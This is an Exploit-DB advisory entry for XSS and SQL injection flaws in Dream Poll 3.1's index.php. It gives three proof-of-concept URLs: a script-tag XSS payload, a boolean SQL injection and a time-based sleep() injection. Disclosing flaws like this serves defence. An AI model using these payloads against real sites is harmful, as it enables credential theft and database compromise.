Dream Poll 3.1 - 'index.php' Cross-Site Scripting and SQL Injection Vulnerabilities

2009-10-13T00:00:00
ID EDB-ID:33282
Type exploitdb
Reporter infosecstuff
Modified 2009-10-13T00:00:00

Description

Dream Poll 3.1 'index.php' Cross-Site Scripting and SQL Injection Vulnerabilities. CVE-2009-4745. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/36663/info

Dream Poll is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Dream Poll 3.1 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?action=loginsortField=poll_default&sortDesc=1&recordsPerPage=1>?><ScRiPt%20%0d%0a>alert(911)%3B</ScRiPt>
http://www.example.com/index.php?action=loginsortField=poll_default+and+31337-31337=0&sortDesc=1&recordsPerPage=20
http://www.example.com/index.php?action=loginsortField=poll_default+and+sleep(3)%23&sortDesc=1&recordsPerPage=20